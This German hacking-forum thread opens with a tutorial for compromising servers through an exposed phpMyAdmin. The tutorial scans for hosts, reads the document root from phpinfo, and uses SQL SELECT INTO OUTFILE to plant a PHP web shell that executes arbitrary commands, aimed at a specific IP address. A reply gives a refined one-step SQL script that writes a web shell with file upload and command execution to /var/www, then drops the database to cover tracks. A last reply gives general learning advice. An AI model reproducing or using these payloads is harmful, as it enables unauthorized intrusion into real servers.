-
Tool,die ihr braucht
Browser
Shell
Scannz
Also, zuerst scannt ihr.Tut gepostet
Die Results sehen dann z.B. so aus:
129.120.43.132 HTTP Request FOUND (200 OK)
Wenn ihr einen solchen scan habt geht ihr auf:
http:\\129.120.43.132\phpmyadmin\phpinfo.php
Dort guckt ihr erstmal ob das System Windows NT hat.
Danach guckt ihr unter _SERVER["DOCUMENT_ROOT"] und
Kopiert dort den Pfad der dort steht.
Das Document_Root tragt ihr dann in die Shell hier ein:
code:
INSERT INTO shell (text) values ('<? $cmd = $_REQUEST["-cmd"];
?><html><head><title>SH3LL</title></head><body bgcolor=#000000 text=#FFFFFF"
onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST> <input type=TEXT
name="-cmd" size=64 value="<?$cmd?>" tyle="background:#000000;color:#FFFFFF;"><pre><?
if ($cmd != ""; ) print Shell_Exec($cmd); ?></pre></form></body></html>'); SELECT * INTO OUTFILE 'HIERDASDOCUMENTROOT\shell.php' from shell;
FLUSH LOGS
Dann geht ihr auf:
http:\\129.120.43.132\phpmyadmin\index.php
Ihr klickt dann auf Datenbanken (Befindet sich links bei der Index.php)
Ihr wechselt dann auf die Datenbank Mysql und tragt da folgenden Sql befehl ein:
CREATE TABLE shell (text text);
Ihr habt dann eine Table erstellt die shell heißt.
Dann wechselt ihr in die Table und fügt dann als Sql befehl die oben geschriebene
Shell ein.
Wenn der Befehl erfolgreich war geht auf:
http:\\129.120.43.132\shell.php
Dort befindet sich eine cmd zeile.
Dann könnt ihr den Server ganz normal hacken wie bei MSSQL
+++++++++++++++++++++++++++++++++++++++++++
Hacken ist gefährlich und man sollte es nur mit bedacht tun !
Hacken ist strafbar und man sollte sich nicht erwischen lassen !
Hacken ist nichts für kleine Script-Kiddies die keinen Plan haben ;P !
++++++++++++++++++++++++++++++++++++++++++++++++
-
wozu die datenbank, buster?
es gibt doch auch server da hat man kein recht, eine db anzulegen - brauchst du ja auch nicht.
es reicht, wenn du dir bei /pma/sql.php über select @@datadir oder select @@basedir das docroot anzeigen lässt und dann
SELECT SHELLCODE INTO OUTFILE '/var/www/shell.php' ; --
eingibst. bzw dann das docroot aus dem entsprechenden fall. das anlegen einer datenbank ist in keinem fall notwendig und wenn, kann man dies auch in einem schritt machen:
Code:
CREATE DATABASE ficker;
use ficker;
CREATE TABLE shell (codetab text);
INSERT INTO shell(codetab) VALUES ('Upload your file:<form enctype="multipart/form-data" action="<?php print $_SERVER["PHP_SELF"];?>" method="post"><input type = "hidden" name = "MAX_FILE_FILE" value = "3096000" /><input type = "file" name = "fileupload"><input type = "submit" value = "Upload!"></form><?php $uploaddir = getcwd() ."\\\\\\\\"; $uploadfile = $uploaddir.basename($_FILES["fileupload"]["name"]); print "<pre>"; if (move_uploaded_file($_FILES["fileupload"]["tmp_name"],$uploadfile)){print " File stored ok...";} print "</pre>"; ?><hr>CMD: <? $cmd = $_REQUEST["-cmd"]; ?> <html><head><title>Got Shell?</title><style type="text/css"><!-- body {color: #CC0000;background-color:#000000;} --></style></head><body> <onLoad="document.forms[0].elements[-cmd].focus()"><form method=POST><br><input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"> <input type = "submit" value ="Exec"><hr> <pre> <? if($cmd != "") print Shell_Exec($cmd); ?> </pre></form></body></html>
');
SELECT * INTO OUTFILE '/var/www/shell.php'FROM shell;
FLUSH LOGS ;
DROP DATABASE `ficker`
bin eher so das bequeme scriptkiddie :D
-
da wir hier ja mittlerweile bei pma angekommen sind, was gerade am anfang das sinnigste wäre, meines wissens nach, ist lesen dein bester freund; und nicht irgendwelche tut`s zum thema hacking sondern erstmal die grundlagen. klein anfangen bring einen oftmals weiter, auch wenns länger dauert. ohne das wissen, was ist sql und was tu ich damit, wirst du keinen echten einstieg finden. alles was du dann findest wir nur cryptisches gelaber sein bei dem du nur bahnhof verstehst. daher kauf dir ein paar bücher (ja wirklich kaufen) mit denen du lernen kannst wie eine datenbak aufgebaut ist und man sie erstellt/verwaltet.
aber auch das ist vielleicht schon ein schritt zuviel am anfang für dich.
was du sagtest mit dem linux auf deinem laptop ist ein sehr guter anfang. aber auch da solltest du den desktop erstmal abschalten und das system nur über die kommandozeile benutzen / verwalten. denn klickibunti wirst du in den meisten standart tools nicht finden die es gibt, und wenn du da schon vor einem unüberwindbaren hinderniss stehst ..... ja. dann hast eben ein problem und musst wieder fragen stellen, die man sich selbst beantworten/erarbeiten sollte, um auch zu zeigen das man es wirklich lernen will; und nicht nur 3 klicks machen will zum stro.
das gui baust du dir dann irgenwann selber für die bestehenden tools oder schreibst vielleicht sogar deine eigenen, für die du am ende auch nen gui baust.
und glaub mir, diese tools wirst du auch nicht einfach verschenken an jeden der einfach mal danach fragt.
bitte nicht falsch verstehn, ich denke schon das du lernen willst, aber der ansatz ist an der falschen stelle. ich selber bin auch nicht sehr viel weiter als du, aber ich habe gelernt, dass man sich dieses wissen nich in ein paar nächten durch tut's lesen aneignen kann ohne das nötige hintergrund wissen.
lange rede, kurzer sinn: hoffe du findest deinen weg, nur nimm keine abkürzungen, die werfen dich mehr zurück als das sie dich nach vorne bringen ;)
so long
trickydicky
